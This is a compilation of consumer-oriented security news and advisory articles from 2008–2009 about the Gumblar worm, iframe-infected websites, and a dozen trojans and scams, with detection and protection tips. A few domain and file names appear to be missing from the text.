Thought the Conficker Virus Was Bad? Gumblar Is Even Worse.
by Terrence O'Brien — Jun 2nd 2009 at 7:19AM

If you thought Conficker was bad, meet Gumblar. If malware programs were comic book villains,
Conficker would be Kingpin -- evil for sure, but really just a big bully. Gumblar on the other hand would
be Galactus -- massive, all-powerful, evil, and extremely difficult to defeat.

ScanSafe, a computer security firm, has been tracking the progress of the worm since its arrival on the
scene in March, according to CNET. Originally, the attack spread through infectious code that was
planted in hacked Web sites and then downloaded malware from the domain on to victims'
computers. But that was just the opening salvo. As Web site operators cleaned their pages of the code,
Gumblar replaced the original material with dynamically generated Javascript (Web site code that is
created on the spot instead of being completely determined beforehand -- a key element of Web apps
like Gmail) that is much harder for security software to detect and remove.

The evolved version also went about adding new domains to the list of sources for downloading its
malware payload, including and, and began exploiting security holes
in Flash and Adobe Reader. The worm also searches out credentials for FTP servers (a method for
uploading files to a Web site) on a victim's computer, using them to infect additional Web sites.

Its not clear how many sites Gumblar has infected, but security firms seem to agree that it accounts for
about 40 percent of all new malware infections right now. According to ScanSafe in just the first two
weeks of May over 3,000 Web sites were compromised and spreading the worm. Most sites have been
quick to clean up the infections as best they can, but, even if all the infected pages were removed,
Gumblar would still have an army of infected PCs (see botnet) to inflict further damage. Already infected
PCs could be used to hijack even more Web sites, by searching out logon information for Web servers
and uploading their malicious payload. Compromised PCs can also be instructed to install Trojans that
steal data and passwords.

The danger posed by Gumblar is so great that ScanSafe suggests a full reformat and reinstallation of
Windows to clean out an infection. It also suggests changing all of your passwords and usernames after
securing your PC.

Detecting an infection is complex, and not fool-proof. According to ScanSafe the best way to find out if
your PC has been hijacked by Gumblar is to follow CNET's well laid out steps:

1) Locate the file sqlsodbc.chm in the Windows system folder (in Windows XP open My Computer then
go to Local Disk (C:) --> Windows --> System32)

2) Obtain the Sha1 of the installed sqlsodbc.chm using FileAlyzer, a free tool for obtaining the Sha1 of a
file. If you've never heard of Sha1 before, don't panic. It's a sort of automatically generated digital
identifier for files designed by the NSA, and used by security applications to confirm that a file is what it
is supposed to be.

3) Compare the obtained Sha1 code and the file's size to the list located on the ScanSafe STAT Blog.

4) If the Sha1 and corresponding file size do not match with a pair on the reference list, it's a potential
sign of a Gumblar infection.


Beware of the Threat From Hacked Websites
As posted on

This year, there has been a large increase in the number of legitimate websites infected by a so-called
"iframe" threat - a type of malicious script.

Several prominent websites have come under attack from hackers who have modified the underlying
code so that malware can be distributed to unsuspecting users who visit the site. When a user visits an
infected site, an invisible connection is established to a remote server, which can then attempt to install
malware on the user's computer. The intention could be to generate spam, or possibly something more
sinister, such as stealing personal information e.g. Bank account or credit card details.

In 2008, several high-profile websites were targeted, including USA Today, ABC News, Target and
Wallmart and simply visiting one of these infected websites could have resulted in the user's computer
being infected. More recently, a number of websites have been detected by avast! as being infected by
a malicious script called "HTML:Iframe-inf". Among the websites affected are a number of Government
sites in the US, including the United States Forest Service, the US International Trade Commission and
the websites of several embassies around the world. Many popular travel and recreational websites
have also been compromised.

Avast! Antivirus will detect and block access to any website that is infected by this threat and will display
a warning that a virus has been detected. If avast! displays this warning, you should discontinue your
attempt to connect to that particular website and either report the infection to the relevant party so that it
can be removed, or post a message on the avast! forum in the section Viruses and Worms so that it can
be investigated to determine whether the website is really infected. Do not ignore this warning, even if
you believe the website to be a reputable one - the recent attacks prove that no websites are immune to

Thanks to one of our regular forum users who reported the infection to the organization concerned, the
website of the US International Trade Commission was quickly repaired and the infection removed,
however, potentially, many more websites remain infected.

To minimize the risk of falling victim to such an attack from this, and other similar threats, it is essential
that your Antivirus software is kept up-to-date. We recommend that your avast! Antivirus is set to update
itself automatically, or alternatively, that you perform regular manual updates, ideally daily.

Alwil Software would like to thank its regular forum users for their help in this particular case and for the
valuable support they continually provide to the rest of the avast! user community. []

12 Sneakiest Computer Viruses
by Dan Reilly, posted Oct 9th 2008 at 2:00PM

The Storm Worm
This virus is one of the nastiest and most prolific out there. It's a back door Trojan - malicious software
disguised as a harmless program - that is spread to PCs via fake news and holiday greeting card e-
mails. Once infected, your computer becomes part of a botnet, a network of computers running and
spreading the malware at an alarmingly fast rate -- so essentially your computer not only slows down,
but also serves as a perpetrator of the crime. How to protect yourself? Don't open any files in e-mails
from people you don't know, turn on your e-mail program's spam prevention tool, and make sure your
virus protection software is up-to-date.

That Obama sex tape e-mail we told you about contains this devious virus. Mal/Hupig-D runs in the
background of Windows and steals your passwords, credit card information, and the like. Virus scanners
look for it now, but rely on your common sense first and don't click on that e-mail. If you're worried that
your computer might be infected with it, don't enter your passwords or credit card information until you
get it looked at by a computer professional.

Sorry, Mac users, but you're in danger too. This Trojan affects computers using Mac OS X 10.4 or 10.5,
and lets the bad guys use your Apple Remote Desktop agent for a host of disturbing activities. The virus
can be used to monitor your keystrokes, transmit passwords, turn on file sharing, take screen shots,
and, creepiest of all, take pictures with the built-in iSight camera -- all unbeknown to you! It's spread
through downloads that you have to agree to, so if you stay sharp, avoid sketchy utilities, and keep your
anti-virus protection current, you'll be fine.

The Facebook Trojan, aka Troj/Dloadr-BPL
Facebook users have probably seen it happen – a friend posts a link to a Web site on other people's
walls, urging them to see a funny video or find out who has a crush on them. Just as with spam e-mails,
the link takes you to a bogus site that tells you to download a newer version of Flash, which turns out to
be Troj/Dloadr-BPL. This virus then lets hackers take over your computer to spread spam and malware.
Basically, criminals are using Facebook because they think users are more likely to visit a link if a friend
tells them to. The solution? Don't click it, or better yet, stop using those annoying Facebook Wall
programs anyway. Be particularly wary of videos posted by people who don't usually send videos (at
least to you).

Beginning in 2005, the Zlob Trojan has been infecting computers by convincing users they need to
download a codec to view a spam or porn video. The Trojan then reroutes your Internet traffic through a
hacker's server. The end result is a computer that shuts down randomly and reboots with confusing text
messages. The newest variation of Zlob actually works on your Wi-Fi router by running through a list of
default user name and password combos, which many users never bother to change. In addition to the
usual anti-virus and trusted downloading advice, this time make sure to change your router's security
settings and passwords on a regular basis. It's that easy.

Starting around the last new year, the Mebroot virus began infiltrating computers' master boot records,
the part of the hard drive that loads the operating system, by installing itself from untrusted Web sites.
The virus installs keyloggers that are triggered when the infected computer is used to visit any of 900
financial sites, stealing user names and passwords any time they're typed (and thus eventually stealing
your money or identity). Unfortunately, his rootkit hides from most virus protection software, but you can
visit GMER to get software that scans and deletes this menace.

The Clipboard Attack
A new threat that's popped up recently uses flash banner ads to take over your computer's clipboard
through the Mozilla Firefox Web browser. You'll know your computer, either Mac or PC, is infected once
your clipboard will only paste a link to a site that sells a bogus security program. Many people are led to
the sites with the infected ads through spam e-mails purporting to come from CNN or MSNBC. It seems
you can get rid of the infection by restarting your computer or killing the Firefox process, and
downloading FlashBlockers for the browser can only help.

Agent.JEN Trojan
This crafty file is mainly getting into computers via the UPS e-mail scam we warned you about a while
ago. The Trojan comes in an attachment that purports to be an invoice for an undeliverable package,
and then stealthily allows your financial data to be stolen by foreign crooks. UPS rarely sends
attachments, so if you receive something suspicious, don't open it and contact customerservice@ups.

Penguin Panic, aka Troj/Agent-HNY
Recently, an iPhone-specific Trojan has been spreading via e-mails that offer a free game for the Apple
product. The virus hides in a file named "," which is attached to e-mails with subject
lines like "Virtual iPhone games!" and "Apple: The most popular game!" The Trojan actually infects
Windows machines, allowing hackers to take control over it. So, to protect yourself, don't download any
free games like this!

Gpcode Ransomware
This Trojan is unique in that when it infects your computer, it encrypts your files and demands payment,
usually around $100, to unlock them. Experts are still unsure how this malware is spread and how to
protect against it outside of constantly backing up your files. On the bright side, the author of the code
was recently identified as a Russian citizen, but authorities have yet to do anything about it.

FakeAV-AD Trojan
Looking for a deal on your anti-virus software? If you're not careful, you could end up downloading a
virus that'll scam you out of your hard-earned money. While there are a variety of these threats around
the Web, a current prevalent one -- the FakeAV-AD Trojan -- pretends to be a free copy of Norton
AntiVirus 2008. If you download it, you'll get a number of security alerts that tell you to buy the full
version with your credit card. Guess what happens next? The sneakiest part about this site, though, is
that it comes up as a Sponsored Link in Google if you're searching for free virus protection.

Rogue Security Applications
Last month, a family of malware called Rogue Security applications comprised over 60% of computer
threats. Much like the fake Norton link, the variations of this Trojan convince users to download security
programs that intend to control your computer and rip you off. Most often, they're downloaded from
those popup ads that say your computer is infected, leading you to download the file even if you try to
close the window. There are many versions of this Trojan, some of which resist anti-virus programs, so
be very careful, but for starters, make sure your browser's pop-up blocker is enabled.
Data Backup
Protect your critical
data...ask how
Computer Services
can help design a
back up plan for
your systems.
Hosting by Yahoo Web Hosting
For Less!